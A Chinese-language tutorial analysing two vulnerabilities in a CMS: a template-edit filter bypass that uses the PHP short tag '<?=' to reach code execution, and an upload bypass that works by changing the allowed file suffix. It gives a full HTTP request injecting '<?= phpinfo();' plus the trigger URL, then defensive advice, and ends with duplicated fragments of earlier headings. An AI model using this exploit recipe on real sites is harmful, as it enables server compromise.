某CMS漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>

该CMS存在两个关键漏洞：<\/p>

模板文件编辑导致的远程代码执行(RCE)漏洞<\/strong> - 通过绕过模板编辑限制实现<\/li>

文件上传漏洞<\/strong> - 通过修改站点配置实现恶意文件上传<\/li> <\/ol>
漏洞1：模板编辑RCE漏洞分析<\/h2>
漏洞原理<\/h3>
该漏洞源于Appcenter.php<\/code>中的模板编辑功能存在限制绕过问题。虽然系统禁止直接编辑PHP模板文件，但攻击者可以通过修改HTML模板文件并插入PHP代码来实现RCE。<\/p>
关键代码分析<\/h3> 模板渲染流程<\/h4> show方法<\/strong>（位于控制器中）：<\/li> <\/ol> public<\/span> function<\/span> show<\/span>() { <\/span><\/span> \/\/ ...省略其他代码... <\/span><\/span><\/span><\/span> $template =<\/span> explode<\/span>("."<\/span>, $info['show_tpl'<\/span>], 2<\/span>); <\/span><\/span> return<\/span> $this-><\/span>view<\/span>-><\/span>fetch<\/span>('show\/'<\/span>.<\/span>$template[0<\/span>]); <\/span><\/span>} <\/span><\/span><\/code><\/pre> 最终调用fetch<\/code>方法渲染模板<\/li> <\/ul> fetch方法<\/strong>：<\/li> <\/ol> public<\/span> function<\/span> fetch<\/span>(string<\/span> $template =<\/span> ''<\/span>, array<\/span> $vars =<\/span> []):<\/span> string<\/span> { <\/span><\/span> return<\/span> $this-><\/span>getContent<\/span>(function<\/span> () use<\/span> ($vars, $template) { <\/span><\/span> $this-><\/span>engine<\/span>()-><\/span>fetch<\/span>($template, array_merge<\/span>($this-><\/span>data<\/span>, $vars)); <\/span><\/span> }); <\/span><\/span>} <\/span><\/span><\/code><\/pre> 底层fetch实现<\/strong>：<\/li> <\/ol> public<\/span> function<\/span> fetch<\/span>(string<\/span> $template, array<\/span> $vars =<\/span> []):<\/span> void<\/span> { <\/span><\/span> \/\/ ...省略其他代码... <\/span><\/span><\/span><\/span> $template =<\/span> $this-><\/span>parseTemplateFile<\/span>($template); <\/span><\/span> if<\/span> ($template) { <\/span><\/span> $cacheFile =<\/span> $this-><\/span>config<\/span>['cache_path'<\/span>] .<\/span> $this-><\/span>config<\/span>['cache_prefix'<\/span>] .<\/span> md5<\/span>($this-><\/span>config<\/span>['layout_on'<\/span>] .<\/span> $this-><\/span>config<\/span>['layout_name'<\/span>] .<\/span> $template) .<\/span> '.'<\/span> .<\/span> ltrim<\/span>($this-><\/span>config<\/span>['cache_suffix'<\/span>], '.'<\/span>); <\/span><\/span> if<\/span> (!<\/span>$this-><\/span>checkCache<\/span>($cacheFile)) { <\/span><\/span> \/\/ 缓存无效重新模板编译 <\/span><\/span><\/span><\/span> $content =<\/span> file_get_contents<\/span>($template); <\/span><\/span> $this-><\/span>compiler<\/span>($content, $cacheFile); <\/span><\/span> } <\/span><\/span> \/\/ ...省略其他代码... <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 关键点<\/strong>：当模板文件被修改后，会触发file_get_contents<\/code>读取模板内容并重新编译缓存<\/li> <\/ul> 模板编辑限制<\/h4> editTheme<\/code>方法中的过滤逻辑：<\/p> if<\/span> (!<\/span>empty<\/span>($content) &&<\/span> $pathinfo['extension'<\/span>]==<\/span>'html'<\/span>) { <\/span><\/span> \/\/ 限制html里面的php相关代码提交 <\/span><\/span><\/span><\/span> if<\/span> (preg_match<\/span>('#<([^?]*)\?php#i'<\/span>, $content) ||<\/span> <\/span><\/span> (preg_match<\/span>('#<\?#i'<\/span>, $content) &&<\/span> preg_match<\/span>('#\?>#i'<\/span>, $content)) ||<\/span> <\/span><\/span> preg_match<\/span>('#\{php#i'<\/span>, $content) ||<\/span> <\/span><\/span> preg_match<\/span>('#\{:phpinfo#i'<\/span>, $content) <\/span><\/span> ) { <\/span><\/span> $this-><\/span>error<\/span>(__<\/span>('Warning: The template has PHP syntax. For safety, please upload it after modifying it in the local editing tool'<\/span>)); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 过滤了常规PHP标签(<?php<\/code>, <? ?><\/code>)和模板中的PHP语法<\/li> 可绕过方式<\/strong>：使用PHP短标签<?=<\/code>（未被过滤）<\/li> <\/ul> 漏洞利用步骤<\/h3> 构造恶意请求修改模板<\/strong>：<\/li> <\/ol> POST \/admin.php\/appcenter\/editTheme.html HTTP\/1.1 Host: 127.0.0.1 Content-Type: application\/x-www-form-urlencoded Cookie: admin_hkcms_lang=zh-cn; HKCMSSESSID=782e7fb254634e9af27235e16ab1dec1 name=default&t=tpl&old=show_product.html&old_path=%2Fshow&path=%2Fshow&filename=show_product.html&content=%3C%3F%3D+phpinfo()%3B%0D%0A&__token__=dc7587409140c54150e9c3245c4503eb <\/code><\/pre> 将show_product.html<\/code>内容修改为<?= phpinfo();<\/code><\/li> <\/ul> 访问触发页面<\/strong>：<\/li> <\/ol> http:\/\/127.0.0.1\/index.php\/index\/show?id=62&catname=wc <\/code><\/pre> 系统会渲染修改后的模板，执行其中的PHP代码<\/li> <\/ul> 漏洞2：文件上传漏洞分析<\/h2> 漏洞原理<\/h3> 系统上传功能允许通过修改站点配置来控制上传文件的后缀名，攻击者可利用此功能上传恶意PHP文件。<\/p> 关键代码分析<\/h3> 上传功能受站点配置控制，上传后的文件后缀以config配置为主。默认情况下，上传目录中的.htaccess<\/code>文件会阻止PHP文件的执行：<\/p> # 禁止访问所有 .html 和 .php 文件 <FilesMatch "\.(html|php)$"> Deny from all <\/FilesMatch> <\/code><\/pre> 漏洞利用步骤<\/h3> 修改站点配置<\/strong>：<\/li> <\/ol> 将上传文件后缀配置修改为允许.php<\/code><\/li> <\/ul> 上传恶意文件<\/strong>：<\/li> <\/ol> 上传一个包含恶意代码的PHP文件<\/li> <\/ul> 访问上传的文件<\/strong>：<\/li> <\/ol> 由于配置已修改，.htaccess<\/code>的限制被绕过，可以正常执行上传的PHP文件<\/li> <\/ul> 防护建议<\/h2> 针对模板编辑RCE漏洞<\/strong>：<\/p> 在模板编辑过滤中增加对PHP短标签的检测<\/li> 禁止在HTML模板中执行任何PHP代码<\/li> 实现更严格的模板内容验证机制<\/li> <\/ul> <\/li> 针对文件上传漏洞<\/strong>：<\/p> 固定上传文件的后缀名，不允许通过配置修改<\/li> 对上传文件内容进行严格检查，防止文件伪装<\/li> 保持上传目录的执行限制，不因配置改变而失效<\/li> <\/ul> <\/li> 通用防护措施<\/strong>：<\/p> 实施严格的权限控制，限制后台功能的访问<\/li> 定期进行安全审计和代码审查<\/li> 保持系统更新，及时修补已知漏洞<\/li> <\/ul> <\/li> <\/ol>

某CMS漏洞分析与利用教学文档<\/h1>

漏洞1：模板编辑RCE漏洞分析<\/h2>

漏洞原理<\/h3> 该漏洞源于Appcenter.php<\/code>中的模板编辑功能存在限制绕过问题。虽然系统禁止直接编辑PHP模板文件，但攻击者可以通过修改HTML模板文件并插入PHP代码来实现RCE。<\/p>

漏洞2：文件上传漏洞分析<\/h2>

漏洞原理<\/h3> 系统上传功能允许通过修改站点配置来控制上传文件的后缀名，攻击者可利用此功能上传恶意PHP文件。<\/p>

漏洞原理<\/h3>
该漏洞源于`Appcenter.php<\/code>中的模板编辑功能存在限制绕过问题。虽然系统禁止直接编辑PHP模板文件，但攻击者可以通过修改HTML模板文件并插入PHP代码来实现RCE。<\/p>`

漏洞原理<\/h3>
系统上传功能允许通过修改站点配置来控制上传文件的后缀名，攻击者可利用此功能上传恶意PHP文件。<\/p>